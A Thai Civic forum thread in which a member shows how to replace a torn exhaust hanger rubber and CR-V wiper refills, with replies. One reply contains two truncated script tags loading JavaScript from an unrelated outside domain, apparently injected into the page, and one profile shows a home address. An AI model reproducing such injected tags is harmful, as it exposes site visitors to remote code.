ตอบ
bas3d

ชื่อเล่น: บาส

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 168

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 168
ให้คำขอบคุณ: 0

ปี: 2004
พฤหัส, 1 สิงหา 2013 00:01 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
ก่อนหน้านี้ก้มลงไปมองไต้ท้อง สังเกตเห็นท่อห้อยมากกว่าปกติ จึงไล่หาตามหูหิ้วต่างๆว่ามีหลุดบ้างไหม

ปูเสื่อก่อน

DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV

ตั้งแม่แรงครับ อีกอันนึงเอาไว้ยกท่อจะได้ใส่ง่ายๆ

DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV

ถอดล้อออกมาก่อน    ยางหิ้วพักกลางขาดเลย เอาลวดมัดไว้ก่อน ต้องรอเข้าเมองไปเบิกศูนย์ ตามร้านอะไหล่ไม่มีเลย

ของใหม่และของเก่าครับ ดูสภาพ

Part ตัวนี้ครับ 60 กว่าบาท 

ดึงของเก่าออก เอาของใหม่ยัดเข้าไป เสร็จครับ 

อันนี้ยางรีฟิลของก้านปัดCRVครับ ต้องบอกเขาว่า ของปี07นะครับ ของปี06มันจะเล็กกว่าครับ ราคายางรีฟิลคู่ละ 350 บ.รวม vat

part ตามนี้ครับ

ฝั่งคนขับ

ฝั่งคนนั่ง

ต้องยี่ห้อ mitsuba 

เทียบกับยางปัดทั่วไปตามคลองถม ใหญ่กว่าเยอะครับ

ขั้นตอนถอดใส่ยางลงก้านปัดลืมถ่ายครับ เดี๋ยวจะถอดมาถ่ายให้ดูถ้าต้องการครับ

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 1 สิงหา 2013 01:48, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: prgs55  Saharat4to  Jameskab 
bas3d

พฤหัส, 1 สิงหา 2013 00:01 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
ต่อครับ ขั้นตอนการถอดใส่ตามรูปเลยครับ ง่ายมากๆ สงสัยตรงไหนถามได้ครับ

DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 1 สิงหา 2013 12:21, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: prgs55  chet_es  Jameskab  jeang 
aumlight

ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 1 สิงหา 2013 10:33 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
รอชมขั้นตอนถอดใส่ยางลงก้านปัด ครับ
bas3d

พฤหัส, 1 สิงหา 2013 12:23 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
aumlight พิมพ์ว่า:
รอชมขั้นตอนถอดใส่ยางลงก้านปัด ครับ

จัดให้แล้วครับผม<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
prgs55

ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 3 สิงหา 2013 12:43 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
เยี่ยมเลย
e22lnj

ชื่อเล่น: บอม

เข้าร่วม: 06 มีนา 2012
ตอบ: 44

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 26

ที่อยู่: 7 ม. ซอยประชาอุทิศ 53 แขวงบางมด เขตทุ่งครุ กทม. 10130
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 6 สิงหา 2013 09:26 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
ผมก็เคยงงพี่   เวลาวิ่งข้ามเนินไม่รุเสียงอะไรหาตั้งนาน  รือโน้นรื้อนี้  บางทีวิ่ง ๆอยู่เสียงท่อสั่นดังมาก  พอเจอปุ๊บอยากจะเขกหัวตัวเองจริงๆ  ยาง ห้อยหม้อพักขาด  555++  ราคาพอๆกันครับ 60 บาท

nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 15 กันยา 2013 05:32 - DIY.เปลี่ยนยางหิ้วท่อพักกลาง สาเหตุของท่อห้อย+เปลี่ยนยางปัดน้ำฝนก้าน CRV
น่าสนใจมากครับ..
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.